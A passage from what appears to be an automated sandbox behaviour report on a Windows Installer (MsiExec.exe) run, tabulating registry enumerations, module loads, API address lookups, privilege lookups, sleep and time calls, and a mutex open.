| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Enumerate Values | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Enumerate Values | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Get Key Info | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\MsiExec.exe | os_pid = 0x598, creation_flags = CREATE_NORMAL_PRIORITY_CLASS, CREATE_UNICODE_ENVIRONMENT, show_window = SW_HIDE |
|
1 |
Module (129)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\system32\TSAPPCMP.DLL | base_address = 0x0 |
|
1 | |
| Load | C:\Windows\system32\OLE32.DLL | base_address = 0x772b0000 |
|
1 | |
| Load | Msi.dll | base_address = 0x72f50000 |
|
7 | |
| Load | C:\Windows\system32\RPCRT4.DLL | base_address = 0x76ba0000 |
|
1 | |
| Load | C:\Windows\system32\USERENV.DLL | base_address = 0x750e0000 |
|
1 | |
| Load | MsiMsg.dll | base_address = 0x74790002 |
|
1 | |
| Load | Ntdll.dll | base_address = 0x778e0000 |
|
1 | |
| Load | COMCTL32 | base_address = 0x74a10000 |
|
1 | |
| Load | C:\Windows\system32\NETAPI32.DLL | base_address = 0x741d0000 |
|
1 | |
| Load | C:\Windows\system32\SHLWAPI.DLL | base_address = 0x771d0000 |
|
1 | |
| Load | WINHTTP | base_address = 0x72190000 |
|
1 | |
| Load | C:\Windows\system32\APPHELP.DLL | base_address = 0x70f00000 |
|
1 | |
| Load | C:\Windows\system32\VERSION.DLL | base_address = 0x74f80000 |
|
1 | |
| Load | C:\Windows\system32\sxs.DLL | base_address = 0xa40001 |
|
2 | |
| Load | C:\Windows\system32\MSCOREE.DLL | base_address = 0x6fce0000 |
|
1 | |
| Load | C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.dll | base_address = 0x9e0001 |
|
2 | |
| Load | C:\Windows\system32\MPR.DLL | base_address = 0x724b0000 |
|
1 | |
| Load | C:\Windows\system32\RSTRTMGR.DLL | base_address = 0x6d880000 |
|
1 | |
| Load | C:\Windows\system32\SHELL32.DLL | base_address = 0x75f10000 |
|
1 | |
| Load | MsiMsg.dll | base_address = 0x9e0002 |
|
8 | |
| Load | C:\Windows\system32\NTDLL.DLL | base_address = 0x778e0000 |
|
1 | |
| Load | MsiMsg.dll | base_address = 0x9f0002 |
|
12 | |
| Load | C:\Windows\system32\KERNELBASE.DLL | base_address = 0x75c20000 |
|
1 | |
| Load | C:\Windows\system32\SFC.DLL | base_address = 0x70f60000 |
|
2 | |
| Load | C:\Windows\system32\SAGE.DLL | base_address = 0x0 |
|
2 | |
| Get Handle | MSCOREE | base_address = 0x0 |
|
1 | |
| Get Filename | c:\windows\system32\msi.dll | process_name = c:\windows\system32\msiexec.exe, file_name_orig = C:\Windows\system32\msi.dll, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoGetCallContext, address_out = 0x772cb385 |
|
1 | |
| Get Address | c:\windows\system32\msi.dll | function = QueryInstanceCount, address_out = 0x72f62ae2 |
|
7 | |
| Get Address | c:\windows\system32\rpcrt4.dll | function = I_RpcBindingInqLocalClientPID, address_out = 0x76bd2019 |
|
1 | |
| Get Address | c:\windows\system32\userenv.dll | function = CreateEnvironmentBlock, address_out = 0x750e1a7a |
|
1 | |
| Get Address | c:\windows\system32\userenv.dll | function = DestroyEnvironmentBlock, address_out = 0x750e1a4e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetThreadPreferredUILanguages, address_out = 0x777f22d7 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = WinSqmIsOptedIn, address_out = 0x77946c03 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x777e480b |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll | function = InitCommonControlsEx, address_out = 0x74a309ce |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitialize, address_out = 0x772cb636 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoTaskMemAlloc, address_out = 0x772fea4c |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoTaskMemFree, address_out = 0x77306f41 |
|
1 | |
| Get Address | c:\windows\system32\netapi32.dll | function = NetGetJoinInformation, address_out = 0x741b2c3f |
|
1 | |
| Get Address | c:\windows\system32\netapi32.dll | function = NetApiBufferFree, address_out = 0x741c13d2 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = UrlIsW, address_out = 0x771e6763 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = UrlGetPartW, address_out = 0x771e80b4 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = UrlCanonicalizeW, address_out = 0x771e7472 |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpOpen, address_out = 0x721958b9 |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpCrackUrl, address_out = 0x721a953a |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpConnect, address_out = 0x7219d9f5 |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpOpenRequest, address_out = 0x72194aea |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpGetIEProxyConfigForCurrentUser, address_out = 0x721a257e |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpGetProxyForUrl, address_out = 0x7219d5dc |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpSendRequest, address_out = 0x721979bd |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpReceiveResponse, address_out = 0x7219b262 |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpQueryHeaders, address_out = 0x7219ba51 |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpQueryDataAvailable, address_out = 0x721ac5dd |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpReadData, address_out = 0x7219cb9e |
|
1 | |
| Get Address | c:\windows\system32\winhttp.dll | function = WinHttpCloseHandle, address_out = 0x72192c01 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = StgOpenStorage, address_out = 0x772c480e |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoGetMalloc, address_out = 0x772f6265 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x772f9d0b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CreateWellKnownSid, address_out = 0x76f8481e |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferiChangeRegistryScope, address_out = 0x76fc0595 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferIdentifyLevel, address_out = 0x76f92102 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferGetLevelInformation, address_out = 0x76f79094 |
|
1 | |
| Get Address | Unknown module name | function = ApphelpGetMsiProperties, address_out = 0x70f27525 |
|
1 | |
| Get Address | Unknown module name | function = SdbInitDatabase, address_out = 0x70f265b0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileAttributesExW, address_out = 0x777f273d |
|
1 | |
| Get Address | Unknown module name | function = GetFileVersionInfoSizeW, address_out = 0x74f819d9 |
|
1 | |
| Get Address | Unknown module name | function = GetFileVersionInfoW, address_out = 0x74f819f4 |
|
1 | |
| Get Address | Unknown module name | function = VerQueryValueW, address_out = 0x74f81b51 |
|
1 | |
| Get Address | Unknown module name | function = GetCORSystemDirectory, address_out = 0x6fce31d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CheckElevationEnabled, address_out = 0x777fdae2 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = UrlCombineW, address_out = 0x771e75fb |
|
1 | |
| Get Address | Unknown module name | function = WNetGetConnectionW, address_out = 0x724b42d7 |
|
1 | |
| Get Address | Unknown module name | function = RmStartSession, address_out = 0x6d88474b |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = SHGetFolderPathW, address_out = 0x75f95708 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitializeEx, address_out = 0x772f09ad |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetSecurityInfo, address_out = 0x76f7b3e4 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SetEntriesInAclW, address_out = 0x76f82a66 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SetSecurityInfo, address_out = 0x76f79edf |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CreateRestrictedToken, address_out = 0x76fb3148 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlCreateEnvironment, address_out = 0x778ebb67 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlDestroyEnvironment, address_out = 0x779517d6 |
|
1 | |
| Get Address | c:\windows\system32\msi.dll | function = DllGetClassObject, address_out = 0x72f7183e |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoImpersonateClient, address_out = 0x772bfed0 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoQueryProxyBlanket, address_out = 0x772e6224 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoRevertToSelf, address_out = 0x772c0065 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoUninitialize, address_out = 0x772f86d3 |
|
1 | |
| Get Address | c:\windows\system32\kernelbase.dll | function = NotifyRedirectedStringChange, address_out = 0x75c3c66d |
|
1 | |
| Get Address | Unknown module name | function = SfcIsFileProtected, address_out = 0x70f51e56 |
|
1 | |
| Get Address | Unknown module name | function = RmEndSession, address_out = 0x6d884979 |
|
1 | |
| Get Address | Unknown module name | function = SfcIsKeyProtected, address_out = 0x70f536cb |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoIsHandlerConnected, address_out = 0x773739b5 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoDisconnectObject, address_out = 0x772ce604 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = SaferCloseLevel, address_out = 0x76f93825 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetWaitableTimer, address_out = 0x777f59ff |
|
1 |
User (36)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeCreateTokenPrivilege, luid = 2 |
|
1 | |
| Lookup Privilege | privilege = SeAssignPrimaryTokenPrivilege, luid = 3 |
|
1 | |
| Lookup Privilege | privilege = SeLockMemoryPrivilege, luid = 4 |
|
1 | |
| Lookup Privilege | privilege = SeIncreaseQuotaPrivilege, luid = 5 |
|
1 | |
| Lookup Privilege | privilege = SeUnsolicitedInputPrivilege, luid = 0 |
|
1 | |
| Lookup Privilege | privilege = SeMachineAccountPrivilege, luid = 6 |
|
1 | |
| Lookup Privilege | privilege = SeTcbPrivilege, luid = 7 |
|
1 | |
| Lookup Privilege | privilege = SeSecurityPrivilege, luid = 8 |
|
1 | |
| Lookup Privilege | privilege = SeTakeOwnershipPrivilege, luid = 9 |
|
4 | |
| Lookup Privilege | privilege = SeLoadDriverPrivilege, luid = 10 |
|
1 | |
| Lookup Privilege | privilege = SeSystemProfilePrivilege, luid = 11 |
|
1 | |
| Lookup Privilege | privilege = SeSystemtimePrivilege, luid = 12 |
|
1 | |
| Lookup Privilege | privilege = SeProfileSingleProcessPrivilege, luid = 13 |
|
1 | |
| Lookup Privilege | privilege = SeIncreaseBasePriorityPrivilege, luid = 14 |
|
1 | |
| Lookup Privilege | privilege = SeCreatePagefilePrivilege, luid = 15 |
|
1 | |
| Lookup Privilege | privilege = SeCreatePermanentPrivilege, luid = 16 |
|
1 | |
| Lookup Privilege | privilege = SeBackupPrivilege, luid = 17 |
|
1 | |
| Lookup Privilege | privilege = SeRestorePrivilege, luid = 18 |
|
4 | |
| Lookup Privilege | privilege = SeShutdownPrivilege, luid = 19 |
|
1 | |
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Lookup Privilege | privilege = SeAuditPrivilege, luid = 21 |
|
1 | |
| Lookup Privilege | privilege = SeSystemEnvironmentPrivilege, luid = 22 |
|
1 | |
| Lookup Privilege | privilege = SeChangeNotifyPrivilege, luid = 23 |
|
1 | |
| Lookup Privilege | privilege = SeRemoteShutdownPrivilege, luid = 24 |
|
1 | |
| Lookup Privilege | privilege = SeUndockPrivilege, luid = 25 |
|
1 | |
| Lookup Privilege | privilege = SeSyncAgentPrivilege, luid = 26 |
|
1 | |
| Lookup Privilege | privilege = SeEnableDelegationPrivilege, luid = 27 |
|
1 | |
| Lookup Privilege | privilege = SeManageVolumePrivilege, luid = 28 |
|
1 | |
| Lookup Privilege | privilege = SeImpersonatePrivilege, luid = 29 |
|
1 | |
| Lookup Privilege | privilege = SeCreateGlobalPrivilege, luid = 30 |
|
1 |
Window (2)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = MsiHiddenWindow, wndproc_parameter = 0 |
|
1 | |
| Create | - | class_name = MsiHiddenWindow, wndproc_parameter = 0 |
|
1 |
System (1764)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = ARRARNMKU |
|
1 | |
| Sleep | duration = -1 (infinite) |
|
14 | |
| Sleep | duration = 150 milliseconds (0.150 seconds) |
|
588 | |
| Sleep | duration = 30000 milliseconds (30.000 seconds) |
|
297 | |
| Sleep | duration = -1 (infinite) |
|
1 | |
| Get Time | type = Ticks, time = 10893596 |
|
1 | |
| Get Time | type = Local Time, time = 2019-01-21 12:19:05 (Local Time) |
|
2 | |
| Get Time | type = Ticks, time = 10912160 |
|
1 | |
| Get Time | type = Ticks, time = 10912176 |
|
4 | |
| Get Time | type = Ticks, time = 10912332 |
|
2 | |
| Get Time | type = Ticks, time = 10912347 |
|
4 | |
| Get Time | type = Ticks, time = 10912457 |
|
4 | |
| Get Time | type = Ticks, time = 10912472 |
|
1 | |
| Get Time | type = Ticks, time = 10912659 |
|
5 | |
| Get Time | type = Ticks, time = 10912675 |
|
1 | |
| Get Time | type = Ticks, time = 10912722 |
|
3 | |
| Get Time | type = Ticks, time = 10912784 |
|
2 | |
| Get Time | type = Ticks, time = 10913112 |
|
6 | |
| Get Time | type = Ticks, time = 10913127 |
|
1 | |
| Get Time | type = Ticks, time = 10913174 |
|
5 | |
| Get Time | type = Ticks, time = 10913283 |
|
1 | |
| Get Time | type = Ticks, time = 10913299 |
|
6 | |
| Get Time | type = Ticks, time = 10913408 |
|
2 | |
| Get Time | type = Ticks, time = 10913424 |
|
3 | |
| Get Time | type = Ticks, time = 10913689 |
|
3 | |
| Get Time | type = Ticks, time = 10913705 |
|
4 | |
| Get Time | type = Ticks, time = 10913829 |
|
2 | |
| Get Time | type = Ticks, time = 10913845 |
|
7 | |
| Get Time | type = Ticks, time = 10913892 |
|
3 | |
| Get Time | type = Ticks, time = 10913954 |
|
2 | |
| Get Time | type = Ticks, time = 10913970 |
|
3 | |
| Get Time | type = Ticks, time = 10914485 |
|
2 | |
| Get Time | type = Ticks, time = 10914500 |
|
8 | |
| Get Time | type = Ticks, time = 10914547 |
|
2 | |
| Get Time | type = Ticks, time = 10914703 |
|
3 | |
| Get Time | type = Ticks, time = 10914719 |
|
7 | |
| Get Time | type = Ticks, time = 10914843 |
|
6 | |
| Get Time | type = Ticks, time = 10914906 |
|
6 | |
| Get Time | type = Ticks, time = 10915421 |
|
2 | |
| Get Time | type = Ticks, time = 10915623 |
|
7 | |
| Get Time | type = Ticks, time = 10915733 |
|
2 | |
| Get Time | type = Ticks, time = 10915748 |
|
4 | |
| Get Time | type = Ticks, time = 10915857 |
|
1 | |
| Get Time | type = Ticks, time = 10915873 |
|
8 | |
| Get Time | type = Ticks, time = 10915920 |
|
2 | |
| Get Time | type = Ticks, time = 10916419 |
|
10 | |
| Get Time | type = Ticks, time = 10916559 |
|
6 | |
| Get Time | type = Ticks, time = 10916622 |
|
6 | |
| Get Time | type = Ticks, time = 10917090 |
|
2 | |
| Get Time | type = Ticks, time = 10917417 |
|
10 | |
| Get Time | type = Ticks, time = 10917480 |
|
3 | |
| Get Time | type = Ticks, time = 10917589 |
|
1 | |
| Get Time | type = Ticks, time = 10917605 |
|
5 | |
| Get Time | type = Ticks, time = 10917714 |
|
3 | |
| Get Time | type = Ticks, time = 10917729 |
|
2 | |
| Get Time | type = Ticks, time = 10918026 |
|
7 | |
| Get Time | type = Ticks, time = 10918369 |
|
3 | |
| Get Time | type = Ticks, time = 10918385 |
|
6 | |
| Get Time | type = Ticks, time = 10918431 |
|
6 | |
| Get Time | type = Ticks, time = 10918494 |
|
1 | |
| Get Time | type = Ticks, time = 10918509 |
|
1 | |
| Get Time | type = Ticks, time = 10919040 |
|
4 | |
| Get Time | type = Ticks, time = 10919055 |
|
6 | |
| Get Time | type = Ticks, time = 10919102 |
|
2 | |
| Get Time | type = Ticks, time = 10919289 |
|
3 | |
| Get Time | type = Ticks, time = 10919305 |
|
7 | |
| Get Time | type = Ticks, time = 10919352 |
|
2 | |
| Get Time | type = Ticks, time = 10919617 |
|
7 | |
| Get Time | type = Ticks, time = 10919804 |
|
1 | |
| Get Time | type = Ticks, time = 10919820 |
|
8 | |
| Get Time | type = Ticks, time = 10919867 |
|
2 | |
| Get Time | type = Ticks, time = 10919882 |
|
6 | |
| Get Time | type = Ticks, time = 10920459 |
|
1 | |
| Get Time | type = Ticks, time = 10920475 |
|
6 | |
| Get Time | type = Ticks, time = 10920522 |
|
2 | |
| Get Time | type = Ticks, time = 10920537 |
|
1 | |
| Get Time | type = Ticks, time = 10920553 |
|
2 | |
| Get Time | type = Ticks, time = 10920678 |
|
6 | |
| Get Time | type = Ticks, time = 10920693 |
|
1 | |
| Get Time | type = Ticks, time = 10920740 |
|
5 | |
| Get Time | type = Ticks, time = 10920865 |
|
1 | |
| Get Time | type = Ticks, time = 10920881 |
|
6 | |
| Get Time | type = Ticks, time = 10921083 |
|
6 | |
| Get Time | type = Ticks, time = 10921099 |
|
6 | |
| Get Time | type = Ticks, time = 10921567 |
|
2 | |
| Get Time | type = Ticks, time = 10921583 |
|
3 | |
| Get Time | type = Ticks, time = 10921879 |
|
2 | |
| Get Time | type = Ticks, time = 10921895 |
|
5 | |
| Get Time | type = Ticks, time = 10922019 |
|
9 | |
| Get Time | type = Ticks, time = 10922144 |
|
8 | |
| Get Time | type = Ticks, time = 10922550 |
|
1 | |
| Get Time | type = Ticks, time = 10922566 |
|
9 | |
| Get Time | type = Ticks, time = 10922690 |
|
1 | |
| Get Time | type = Ticks, time = 10922706 |
|
5 | |
| Get Time | type = Ticks, time = 10922768 |
|
6 | |
| Get Time | type = Ticks, time = 10923314 |
|
4 | |
| Get Time | type = Ticks, time = 10923330 |
|
2 | |
| Get Time | type = Ticks, time = 10923377 |
|
2 | |
| Get Time | type = Ticks, time = 10923392 |
|
4 | |
| Get Time | type = Ticks, time = 10923439 |
|
1 | |
| Get Time | type = Ticks, time = 10923455 |
|
1 | |
| Get Time | type = Ticks, time = 10923970 |
|
4 | |
| Get Time | type = Ticks, time = 10923985 |
|
3 | |
| Get Time | type = Ticks, time = 10924157 |
|
1 | |
| Get Time | type = Ticks, time = 10924172 |
|
8 | |
| Get Time | type = Ticks, time = 10924219 |
|
1 | |
| Get Time | type = Ticks, time = 10924235 |
|
7 | |
| Get Time | type = Ticks, time = 10924812 |
|
1 | |
| Get Time | type = Ticks, time = 10924828 |
|
6 | |
| Get Time | type = Ticks, time = 10924874 |
|
5 | |
| Get Time | type = Ticks, time = 10925015 |
|
4 | |
| Get Time | type = Ticks, time = 10925030 |
|
3 | |
| Get Time | type = Ticks, time = 10925077 |
|
3 | |
| Get Time | type = Ticks, time = 10925093 |
|
2 | |
| Get Time | type = Ticks, time = 10925218 |
|
6 | |
| Get Time | type = Ticks, time = 10925233 |
|
1 | |
| Get Time | type = Ticks, time = 10925420 |
|
12 | |
| Get Time | type = Ticks, time = 10925467 |
|
2 | |
| Get Time | type = Ticks, time = 10925483 |
|
3 | |
| Get Time | type = Ticks, time = 10926013 |
|
7 | |
| Get Time | type = Ticks, time = 10926216 |
|
12 | |
| Get Time | type = Ticks, time = 10926684 |
|
5 | |
| Get Time | type = Ticks, time = 10927012 |
|
2 | |
| Get Time | type = Ticks, time = 10927027 |
|
5 | |
| Get Time | type = Ticks, time = 10927074 |
|
4 | |
| Get Time | type = Ticks, time = 10927090 |
|
2 | |
| Get Time | type = Ticks, time = 10927136 |
|
5 | |
| Get Time | type = Ticks, time = 10927152 |
|
1 | |
| Get Time | type = Ticks, time = 10927199 |
|
3 | |
| Get Time | type = Ticks, time = 10927261 |
|
2 | |
| Get Time | type = Ticks, time = 10927714 |
|
3 | |
| Get Time | type = Ticks, time = 10927729 |
|
7 | |
| Get Time | type = Ticks, time = 10927854 |
|
6 | |
| Get Time | type = Ticks, time = 10927916 |
|
6 | |
| Get Time | type = Ticks, time = 10928369 |
|
2 | |
| Get Time | type = Ticks, time = 10928696 |
|
1 | |
| Get Time | type = Ticks, time = 10928712 |
|
6 | |
| Get Time | type = Ticks, time = 10928837 |
|
6 | |
| Get Time | type = Ticks, time = 10928962 |
|
7 | |
| Get Time | type = Ticks, time = 10928977 |
|
2 | |
| Get Time | type = Ticks, time = 10929242 |
|
1 | |
| Get Time | type = Ticks, time = 10929258 |
|
5 | |
| Get Time | type = Ticks, time = 10929430 |
|
3 | |
| Get Time | type = Ticks, time = 10929710 |
|
5 | |
| Get Time | type = Ticks, time = 10929851 |
|
1 | |
| Get Time | type = Ticks, time = 10929866 |
|
6 | |
| Get Time | type = Ticks, time = 10930007 |
|
6 | |
| Get Time | type = Ticks, time = 10930038 |
|
3 | |
| Get Time | type = Ticks, time = 10930132 |
|
6 | |
| Get Time | type = Ticks, time = 10930163 |
|
2 | |
| Get Time | type = Ticks, time = 10931083 |
|
1 | |
| Get Time | type = Ticks, time = 10931099 |
|
5 | |
| Get Time | type = Local Time, time = 2019-01-21 12:19:44 (Local Time) |
|
128 | |
| Get Time | type = Ticks, time = 10932175 |
|
1 | |
| Get Time | type = Ticks, time = 10932487 |
|
1 | |
| Get Time | type = Local Time, time = 2019-01-21 12:19:57 (Local Time) |
|
58 | |
| Get Time | type = Local Time, time = 2019-01-21 12:19:58 (Local Time) |
|
69 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
19 | |
| Get Info | type = Operating System |
|
5 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
5 | |
| Get Info | type = Hardware Information |
|
1 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | mutex_name = Global\_MSIExecute, desired_access = SYNCHRONIZE |
|
1 | |
